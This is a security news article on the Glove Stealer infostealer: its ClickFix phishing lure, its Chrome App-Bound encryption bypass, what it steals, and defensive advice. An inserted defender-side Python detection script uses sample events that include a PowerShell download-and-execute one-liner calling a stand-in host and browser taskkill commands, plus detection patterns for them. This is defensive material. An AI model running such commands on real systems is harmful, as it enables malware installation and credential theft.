November 16, 2024
Glove Stealer Malware Bypasses Chrome's Encryption Defenses


Glove Stealer Malware Challenges Chrome Security

Cybersecurity researchers from Gen Digital have uncovered a sophisticated new information-stealing malware called Glove Stealer that specifically targets browser data, cryptocurrency wallets, and authentication credentials by exploiting Chrome's IElevator service to bypass App-Bound encryption.

"Glove Stealer represents a concerning evolution in information-stealing malware, combining social engineering tactics with technical sophistication to compromise user data," researchers revealed in a detailed analysis published Tuesday.

The malware, written in .NET, is being distributed through phishing campaigns that mimic ClickFix, a legitimate troubleshooting tool. Users receive HTML attachments containing fake error messages that trick them into executing malicious PowerShell commands.

[Figure: Example ClickFix HTML page being distributed in phishing email attachments (Image Source: Gen Digital)]

What makes Glove Stealer particularly dangerous is its ability to bypass Chrome's App-Bound encryption, introduced in version 127, by exploiting the IElevator service - a technique that was only recently disclosed by security researcher Alexander Hagenah in late October 2024.

The malware's capabilities include:

  • Stealing data from over 280 browser extensions and 80+ local applications

  • Targeting cryptocurrency wallets, 2FA authenticators, and password managers

  • Harvesting cookies, autofill data, and login credentials

  • Exfiltrating sensitive information from email clients and gaming platforms

The infection chain begins with phishing emails containing HTML attachments that display fake error messages. When users follow the "fixing" instructions, they unknowingly execute a malicious script that downloads Glove Stealer from command-and-control (C2) servers like "master.volt-texs[.]online".

To maintain stealth, the malware terminates browser processes for Chrome, Edge, Opera, Brave, and others before extracting sensitive data. It organizes the stolen information into categorized directories and encrypts it with 3DES before exfiltration.

"The malware employs a dedicated supporting module that must be placed in Chrome's Program Files directory to successfully bypass the App-Bound encryption," the researchers explained. "This requires local admin privileges, highlighting the sophisticated nature of the attack."
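As an added defender-side example (not code from the article or from Gen Digital's analysis), the following Python sketch runs three detections over constructed Sysmon-style events that mirror the chain described above: a PowerShell download-and-execute launched from explorer.exe (the pasted ClickFix command), a burst of browser process terminations, and a file written into Chrome's Program Files directory by something other than an assumed-legitimate updater. The event field names, the updater allow-list and all sample values are assumptions.

```python
import re

# Constructed Sysmon-style events (not telemetry from the Gen Digital report):
# an explorer.exe-spawned PowerShell downloader, a burst of browser kills,
# and a file dropped into Chrome's Program Files directory.
SAMPLE_EVENTS = [
    {"type": "proc", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -c "iwr http://c2.example/p | iex"'},
    {"type": "proc", "parent": "powershell.exe", "image": "taskkill.exe", "cmd": "taskkill /F /IM chrome.exe"},
    {"type": "proc", "parent": "powershell.exe", "image": "taskkill.exe", "cmd": "taskkill /F /IM msedge.exe"},
    {"type": "proc", "parent": "powershell.exe", "image": "taskkill.exe", "cmd": "taskkill /F /IM brave.exe"},
    {"type": "file", "image": "dropper.exe",
     "path": r"C:\Program Files\Google\Chrome\Application\helper.dll"},
    {"type": "file", "image": "GoogleUpdate.exe",
     "path": r"C:\Program Files\Google\Chrome\Application\chrome.dll"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "firefox.exe"}
CHROME_DIR = "c:\\program files\\google\\chrome\\application\\"
CHROME_WRITERS = {"googleupdate.exe", "setup.exe"}  # assumed legitimate updater images
# download cmdlet followed by an execute cmdlet on the same command line
DOWNLOAD_EXEC = re.compile(r"(iwr|invoke-webrequest|downloadstring).*\b(iex|invoke-expression)\b", re.I)


def detect(events):
    """Return alert names raised by the three Glove-Stealer-style behaviours."""
    alerts = []
    kills = {}  # parent image -> set of browser images it terminated
    for ev in events:
        if ev["type"] == "proc":
            cmd = ev["cmd"].lower()
            # ClickFix: user pastes a download-and-run one-liner into the Run dialog / shell
            if (ev["parent"].lower() == "explorer.exe" and ev["image"].lower() == "powershell.exe"
                    and DOWNLOAD_EXEC.search(cmd)):
                alerts.append("clickfix_powershell_downloader")
            if ev["image"].lower() == "taskkill.exe":
                m = re.search(r"/im\s+(\S+)", cmd)
                if m and m.group(1) in BROWSERS:
                    kills.setdefault(ev["parent"].lower(), set()).add(m.group(1))
        elif ev["type"] == "file":
            # supporting module dropped next to chrome.exe by a non-updater process
            if ev["path"].lower().startswith(CHROME_DIR) and ev["image"].lower() not in CHROME_WRITERS:
                alerts.append("unexpected_write_to_chrome_dir")
    # three or more distinct browsers killed by one parent looks like pre-theft cleanup
    for parent, names in kills.items():
        if len(names) >= 3:
            alerts.append("browser_kill_burst:" + parent)
    return alerts
```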

The stolen data is meticulously organized into specific directories:

  • \AllPws.txt for passwords

  • \Cookies\ for browser cookies

  • \Autofill\ for form data

  • \OTP\ for two-factor authentication data

  • \Wallets\ for cryptocurrency credentials

The malware also creates a detailed system fingerprint containing information about the victim's operating system, hardware, and user environment.

To protect against Glove Stealer infections, security experts recommend:

  • Being cautious of emails containing HTML attachments

  • Never copying and pasting commands from untrusted sources

  • Keeping browsers and security software up to date

  • Using strong authentication methods for sensitive accounts

The discovery of Glove Stealer highlights the ongoing evolution of information-stealing malware and the importance of maintaining robust security practices, especially as attackers continue to find new ways to bypass modern browser security features.

Researchers have published indicators of compromise (IoCs) and detailed technical analysis to help organizations detect and prevent Glove Stealer infections. The investigation into the malware's distribution networks and potential connections to other cybercrime operations is ongoing.

Anthony Denis

Anthony Denis is a Security News Reporter with a Bachelor's in Business Computer Application. Drawing from a decade of digital media marketing experience and two years of freelance writing, he brings technical expertise to cybersecurity journalism. His background in IT, content creation, and social media management enables him to deliver complex security topics with clarity and insight.